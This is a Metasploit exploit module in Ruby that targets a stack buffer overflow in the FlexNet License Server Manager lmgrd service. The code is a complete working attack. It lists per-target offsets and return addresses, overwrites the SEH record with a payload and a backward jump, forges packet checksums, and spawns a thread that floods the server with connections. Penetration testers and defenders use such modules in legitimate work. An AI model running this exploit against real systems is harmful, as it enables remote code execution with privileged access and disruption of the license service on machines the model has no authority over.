GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
  # Module metadata is assembled from a few named locals so the long
  # literal reads as separate pieces instead of one deeply nested hash.
  authors = [
    'Luigi Auriemma', # Vulnerability Discovery and PoC
    'Alexander Gavrun', # Vulnerability Discovery
    'juan vazquez', # Metasploit module
    'sinn3r' # Metasploit module
  ]

  references = [
    [ 'OSVDB', '81899' ],
    [ 'BID', '52718' ],
    [ 'ZDI', '12-052' ],
    [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
    [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
  ]

  # Per-target layout used by do_exploit: 'ShellcodeOffset' is where the
  # payload is placed in the body, 'Offset' is the total length before the
  # SEH record, and 'Ret' is handed to generate_seh_record (a pop/pop/ret
  # address in lmgrd.exe according to the inline notes).
  targets = [
    [ 'Debug', {} ],
    [
      'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
      {
        'Offset' => 10476,
        'ShellcodeOffset' => 5484,
        'Ret' => 0x0047d01f # ppr from lmgrd.exe
      }
    ],
    [
      'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
      {
        'Offset' => 7324,
        'ShellcodeOffset' => 2332,
        'Ret' => 0x004eda91 # ppr from lmgrd.exe
      }
    ],
    [
      'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
      {
        'Offset' => 7320,
        'ShellcodeOffset' => 2328,
        'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
      }
    ],
  ]

  super(
    update_info(
      info,
      'Name' => 'FlexNet License Server Manager lmgrd Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability in the FlexNet
        License Server Manager.

        The vulnerability is due to the insecure usage of memcpy
        in the lmgrd service when handling network packets, which
        results in a stack buffer overflow.

        In order to improve reliability, this module will make lots of
        connections to lmgrd during each attempt to maximize its success.
      },
      'Author' => authors,
      'License' => MSF_LICENSE,
      'References' => references,
      'Privileged' => true,
      'DefaultOptions' => {
        'EXITFUNC' => 'process'
      },
      # 'Space' must stay below Offset - ShellcodeOffset (4992 for every
      # target above) so the filler do_exploit inserts after the payload
      # never has a negative length.
      'Payload' => {
        'Space' => 4000
      },
      'Platform' => 'win',
      'Targets' => targets,
      'DefaultTarget' => 1,
      'DisclosureDate' => '2012-03-23',
      # NOTE(review): all three notes are still the UNKNOWN_* placeholders.
      # The description itself says the module opens many connections per
      # attempt, which belongs under SideEffects once assessed.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
  )

  register_options(
    [
      Opt::RPORT(27000),
      OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),
      OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),
      OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])
    ]
  )
end
# 8-bit header checksum: the sum of byte 0 and bytes 2..19 of the
# 20-byte header, truncated to one byte. Byte 1 is skipped because
# that is the slot create_packet stores this value in.
#
# Bytes past index 19 are ignored; a packet shorter than 20 bytes
# raises, exactly as the original indexing did.
#
# @param packet [String] at least the first 20 bytes of a packet
# @return [Integer] checksum in 0..255
def header_checksum(packet)
  bytes = packet.unpack("C*")
  # Start from byte 0 and fold in indices 2..0x13 (19), never index 1.
  total = (2...0x14).reduce(bytes[0]) { |acc, idx| acc + bytes[idx] }
  total & 0x0FF
end
# 16-bit table-driven checksum over the packet body (CRC-16 style,
# shift-right form with the constant 0x3A5D). The 256-entry table is
# rebuilt on every call, as in the original.
#
# NOTE(review): only the first `packet_data.length` bytes are folded in.
# That is the character count, not the byte count, so a string whose
# two counts differ would have its tail ignored; create_packet appears to
# pass buffers where they agree, but that is not checked here.
#
# @param packet_data [String] bytes to checksum
# @return [Integer] checksum in 0..0xFFFF
def data_checksum(packet_data)
  table = Array.new(256) do |seed|
    acc = 0
    bits = seed
    8.times do
      acc = if ((acc ^ bits) & 1) == 1
              ((acc >> 1) ^ 0x3A5D) & 0x0FFFF
            else
              (acc >> 1) & 0x0FFFF
            end
      bits >>= 1
    end
    acc
  end

  bytes = packet_data.unpack("C*")
  bytes.first(packet_data.length).reduce(0) do |crc, byte|
    (table[byte ^ (crc & 0x0FF)] ^ (crc >> 8)) & 0x0FFFF
  end
end
# Frames `data` in the 20-byte header this module uses:
#   byte 0      0x2f
#   byte 1      header checksum (header_checksum over bytes 0..19, written last)
#   bytes 2-3   data checksum (data_checksum over everything from byte 4 on)
#   bytes 4-5   total packet length, big-endian
#   bytes 6-19  zero
#
# The data checksum covers the length field, so the length is written
# first; the header checksum covers bytes 2..5, so it is written last.
#
# @param data [String] packet body
# @return [String] the complete packet
def create_packet(data)
  pkt = "\x2f\x00\x00\x00\x00\x00" # type byte, then 1+2+2 zeroed checksum/length fields
  pkt << ("\x00" * 14)               # remainder of the 20-byte header
  pkt << data

  pkt[4, 2] = [pkt.length].pack("n")
  pkt[2, 2] = [data_checksum(pkt[4, pkt.length - 4])].pack("n")
  pkt[1] = [header_checksum(pkt[0, 20])].pack("C")

  pkt
end
# Opens `datastore['Jam']` connections in a row, each sending one packet
# with an empty body and then closing. do_exploit runs this on a separate
# framework thread alongside its own connection.
#
# Every iteration is a full connect/put/disconnect, so the observable
# effect is a burst of short TCP connections to RPORT.
def jam
  empty_pkt = create_packet("")
  burst = datastore['Jam']

  burst.times do
    connect
    sock.put(empty_pkt)
    disconnect
  end
end
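# Runs do_exploit up to `datastore['Attempts']` times, sleeping
# `datastore['Wait']` seconds after each, and stops early once a session
# exists. Reports a failure if no session appeared.
#
# The failure message now counts attempts actually made; the previous
# version printed the loop counter, which had already advanced one past
# the final attempt (e.g. "after 21 attempts" with Attempts = 20).
def exploit
  max_attempts = datastore['Attempts']
  made = 0

  while made < max_attempts && !session_created?
    made += 1
    print_status("Attempt #{made}/#{max_attempts} to exploit...")
    do_exploit
    sleep(datastore['Wait'])
  end

  print_error("Exploit didn't work after #{made} attempts") unless session_created?
end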
# One exploitation attempt: starts the jam thread, builds a 65535-byte
# packet for the selected target, sends it, and runs the handler.
def do_exploit
  # Background thread running jam; the handle is never joined or checked,
  # so the thread runs concurrently with the connection made below.
  t = framework.threads.spawn("jam", false) { jam }
  my_payload = payload.encoded

  header_length = 20 # See create_packet() to understand this number
  pkt_data = ""
  if target.name =~ /Debug/
    # Debug target: a body of 'a' bytes that, with the header, fills 65535 bytes.
    pkt_data << "a" * (65535 - header_length)
  else

    # Body layout: random bytes up to ShellcodeOffset, the payload, random
    # filler up to Offset, the SEH record, a short backward jump, then
    # random filler so the whole packet is 65535 bytes.
    # Offset - ShellcodeOffset is 4992 for every target, which together
    # with Payload 'Space' => 4000 keeps the filler length non-negative.
    pkt_data << rand_text(target['ShellcodeOffset'])
    pkt_data << my_payload
    pkt_data << rand_text(target['Offset'] - target['ShellcodeOffset'] - my_payload.length)
    pkt_data << generate_seh_record(target.ret)
    pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
    pkt_data << rand_text(65535 - pkt_data.length - header_length)
  end

  pkt = create_packet(pkt_data)

  connect
  sock.put(pkt)
  handler
  disconnect
end
end